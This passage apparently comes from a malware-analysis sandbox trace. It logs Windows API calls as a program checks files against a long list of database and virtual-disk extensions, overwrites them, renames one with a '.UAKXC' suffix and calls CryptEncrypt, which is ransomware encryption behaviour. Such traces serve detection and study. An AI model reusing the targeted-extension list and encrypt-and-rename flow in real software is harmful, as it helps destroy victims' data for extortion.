(lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".adb") returned 0x0 [0139.828] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".ade") returned 0x0 [0139.828] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".adf") returned 0x0 [0139.828] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".adp") returned 0x0 [0139.828] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".arc") returned 0x0 [0139.828] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".ora") returned 0x0 [0139.828] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".alf") returned 0x0 [0139.828] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".ask") returned 0x0 [0139.828] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".btr") returned 0x0 [0139.828] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".bdf") returned 0x0 [0139.828] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".cat") returned 0x0 [0139.828] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".cdb") returned 0x0 [0139.828] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".ckp") returned 0x0 [0139.829] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".cma") returned 0x0 [0139.829] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".cpd") returned 0x0 [0139.829] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".dacpac") returned 0x0 [0139.829] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".dad") returned 0x0 [0139.829] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".dadiagrams") returned 0x0 [0139.829] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".daschema") returned 0x0 [0139.829] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".db") returned 0x0 [0139.829] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".db-shm") returned 0x0 [0139.829] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".db-wal") returned 0x0 [0139.829] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".db3") returned 0x0 [0139.829] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".dbc") returned 0x0 [0139.829] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".dbf") returned 0x0 [0139.829] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".dbs") returned 0x0 [0139.829] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".dbt") returned 0x0 [0139.829] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".dbv") returned 0x0 [0139.829] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".dbx") returned 0x0 [0139.829] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".dcb") returned 0x0 [0139.829] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".dct") returned 0x0 [0139.829] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".dcx") returned 0x0 [0139.829] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".ddl") returned 0x0 [0139.830] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".dlis") returned 0x0 [0139.830] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".dp1") returned 0x0 [0139.830] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".dqy") returned 0x0 [0139.830] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".dsk") returned 0x0 [0139.830] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".dsn") returned 0x0 [0139.830] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".dtsx") returned 0x0 [0139.830] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".dxl") returned 0x0 [0139.830] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".eco") returned 0x0 [0139.830] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".ecx") returned 0x0 [0139.830] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".edb") returned 0x0 [0139.830] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".epim") returned 0x0 [0139.830] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".exb") returned 0x0 [0139.830] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".fcd") returned 0x0 [0139.830] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".fdb") returned 0x0 [0139.830] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".fic") returned 0x0 [0139.830] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".fmp") returned 0x0 [0139.830] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".fmp12") returned 0x0 [0139.830] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".fmpsl") returned 0x0 [0139.831] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".fol") returned 0x0 [0139.831] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".fp3") returned 0x0 [0139.831] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".fp4") returned 0x0 [0139.831] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".fp5") returned 0x0 [0139.831] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".fp7") returned 0x0 [0139.831] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".fpt") returned 0x0 [0139.831] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".frm") returned 0x0 [0139.831] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".gdb") returned 0x0 [0139.831] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".grdb") returned 0x0 [0139.831] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".gwi") returned 0x0 [0139.831] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".hdb") returned 0x0 [0139.831] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".his") returned 0x0 [0139.831] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".ib") returned 0x0 [0139.831] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".idb") returned 0x0 [0139.831] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".ihx") returned 0x0 [0139.831] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".itdb") returned 0x0 [0139.831] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".itw") returned 0x0 [0139.831] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".jet") returned 0x0 [0139.831] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".jtx") returned 0x0 [0139.831] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".kdb") returned 0x0 [0139.832] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".kexi") returned 0x0 [0139.832] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".kexic") returned 0x0 [0139.832] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".kexis") returned 0x0 [0139.832] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".lgc") returned 0x0 [0139.832] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".lwx") returned 0x0 [0139.832] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".maf") returned 0x0 [0139.832] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".maq") returned 0x0 [0139.832] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".mar") returned 0x0 [0139.832] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".mas") returned 0x0 [0139.832] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".mav") returned 0x0 [0139.832] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".mdb") returned 0x0 [0139.832] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".mdf") returned 0x0 [0139.832] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".mpd") returned 0x0 [0139.832] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".mrg") returned 0x0 [0139.832] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".mud") returned 0x0 [0139.832] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".mwb") returned 0x0 [0139.832] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".myd") returned 0x0 [0139.832] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".ndf") returned 0x0 [0139.832] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".nnt") returned 0x0 [0139.832] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".nrmlib") returned 0x0 [0139.833] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".ns2") returned 0x0 [0139.833] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".ns3") returned 0x0 [0139.833] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".ns4") returned 0x0 [0139.833] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".nsf") returned 0x0 [0139.833] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".nv") returned 0x0 [0139.833] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".nv2") returned 0x0 [0139.833] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".nwdb") returned 0x0 [0139.833] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".nyf") returned 0x0 [0139.833] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".odb") returned 0x0 [0139.833] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".oqy") returned 0x0 [0139.833] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".orx") returned 0x0 [0139.833] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".owc") returned 0x0 [0139.833] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".p96") returned 0x0 [0139.833] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".p97") returned 0x0 [0139.833] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".pan") returned 0x0 [0139.833] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".pdb") returned 0x0 [0139.833] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".pdm") returned 0x0 [0139.833] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".pnz") returned 0x0 [0139.833] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".qry") returned 0x0 [0139.834] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".qvd") returned 0x0 [0139.834] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".rbf") returned 0x0 [0139.834] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".rctd") returned 0x0 [0139.834] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".rod") returned 0x0 [0139.834] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".rodx") returned 0x0 [0139.834] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".rpd") returned 0x0 [0139.834] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".rsd") returned 0x0 [0139.834] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".sas7bdat") returned 0x0 [0139.834] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".sbf") returned 0x0 [0139.834] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".scx") returned 0x0 [0139.834] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".sdb") returned 0x0 [0139.834] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".sdc") returned 0x0 [0139.834] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".sdf") returned 0x0 [0139.834] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".sis") returned 0x0 [0139.834] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".spq") returned 0x0 [0139.834] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".sql") returned 0x0 [0139.834] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".sqlite") returned 0x0 [0139.834] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".sqlite3") returned 0x0 [0139.834] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".sqlitedb") returned 0x0 [0139.835] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".te") returned 0x0 [0139.835] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".temx") returned 0x0 [0139.835] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".tmd") returned 0x0 [0139.835] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".tps") returned 0x0 [0139.835] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".trc") returned 0x0 [0139.835] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".trm") returned 0x0 [0139.835] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".udb") returned 0x0 [0139.835] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".udl") returned 0x0 [0139.835] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".usr") returned 0x0 [0139.835] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".v12") returned 0x0 [0139.835] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".vis") returned 0x0 [0139.835] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".vpd") returned 0x0 [0139.835] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".vvv") returned 0x0 [0139.835] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".wdb") returned 0x0 [0139.835] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".wmdb") returned 0x0 [0139.835] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".wrk") returned 0x0 [0139.835] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".xdb") returned 0x0 [0139.835] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".xld") returned 0x0 [0139.835] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".xmlff") returned 0x0 [0139.835] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".abcddb") returned 0x0 [0139.836] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".abs") returned 0x0 [0139.836] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".abx") returned 0x0 [0139.836] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".accdw") returned 0x0 [0139.836] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".adn") returned 0x0 [0139.836] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".db2") returned 0x0 [0139.836] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".fm5") returned 0x0 [0139.836] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".hjt") returned 0x0 [0139.836] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".icg") returned 0x0 [0139.836] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".icr") returned 0x0 [0139.836] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".kdb") returned 0x0 [0139.836] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".lut") returned 0x0 [0139.836] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".maw") returned 0x0 [0139.836] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".mdn") returned 0x0 [0139.836] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".mdt") returned 0x0 [0139.836] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".vdi") returned 0x0 [0139.836] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".vhd") returned 0x0 [0139.836] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".vmdk") returned 0x0 [0139.836] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".pvm") returned 0x0 [0139.836] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".vmem") returned 0x0 [0139.836] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".vmsn") returned 0x0 [0139.836] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".vmsd") returned 0x0 [0139.837] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".nvram") returned 0x0 [0139.837] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".vmx") returned 0x0 [0139.837] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".raw") returned 0x0 [0139.837] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".qcow2") returned 0x0 [0139.837] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".subvol") returned 0x0 [0139.837] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".bin") returned 0x0 [0139.837] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".vsv") returned 0x0 [0139.837] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".avhd") returned 0x0 [0139.837] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".vmrs") returned 0x0 [0139.837] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".vhdx") returned 0x0 [0139.837] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".avdx") returned 0x0 [0139.837] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".vmcx") returned 0x0 [0139.837] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".iso") returned 0x0 [0139.837] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.837] WriteFile (in: hFile=0x210, lpBuffer=0x383fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x383fc78, lpOverlapped=0x0 | out: lpBuffer=0x383fd70*, lpNumberOfBytesWritten=0x383fc78*=0x20c, lpOverlapped=0x0) returned 1 [0139.846] WriteFile (in: hFile=0x210, lpBuffer=0x383fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x383fc7c, lpOverlapped=0x0 | out: lpBuffer=0x383fc80*, lpNumberOfBytesWritten=0x383fc7c*=0xa, lpOverlapped=0x0) returned 1 [0139.846] SetEndOfFile (hFile=0x210) returned 1 [0139.846] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.846] ReadFile (in: hFile=0x210, lpBuffer=0x4610000, nNumberOfBytesToRead=0x5aea, lpNumberOfBytesRead=0x383fc88, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc88*=0x5aea, lpOverlapped=0x0) returned 1 [0139.858] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0xffffa516, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.858] WriteFile (in: hFile=0x210, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x5aea, lpNumberOfBytesWritten=0x383fc44, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc44*=0x5aea, lpOverlapped=0x0) returned 1 [0139.858] CloseHandle (hObject=0x210) returned 1 [0139.863] GetProcessHeap () returned 0xea0000 [0139.863] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef04c8 [0139.863] lstrcpyW (in: lpString1=0xef04c8, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\install.log" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\install.log") returned="C:\\Program Files (x86)\\Mozilla Firefox\\install.log" [0139.863] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpString2=".UAKXC" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\install.log.UAKXC") returned="C:\\Program Files (x86)\\Mozilla Firefox\\install.log.UAKXC" [0139.863] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\install.log" (normalized: "c:\\program files (x86)\\mozilla firefox\\install.log"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\install.log.UAKXC" (normalized: "c:\\program files (x86)\\mozilla firefox\\install.log.uakxc")) returned 1 [0139.864] GetProcessHeap () returned 0xea0000 [0139.864] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef04c8 | out: hHeap=0xea0000) returned 1 [0139.864] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee8d8 | out: hHeap=0xea0000) returned 1 [0139.864] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecf90 | out: hHeap=0xea0000) returned 1 [0139.864] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0139.864] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0139.865] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0139.865] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk" (normalized: "c:\\program files (x86)\\mozilla firefox\\nssdbm3.chk")) returned 0x20 [0139.866] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk" (normalized: "c:\\program files (x86)\\mozilla firefox\\nssdbm3.chk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0139.866] GetLastError () returned 0x0 [0139.866] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x383fc88 | out: lpFileSize=0x383fc88*=899) returned 1 [0139.866] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".4dd") returned 0x0 [0139.866] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".4dl") returned 0x0 [0139.866] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".accdb") returned 0x0 [0139.866] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".accdc") returned 0x0 [0139.866] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".accde") returned 0x0 [0139.866] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".accdr") returned 0x0 [0139.866] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".accdt") returned 0x0 [0139.866] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".accft") returned 0x0 [0139.866] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".adb") returned 0x0 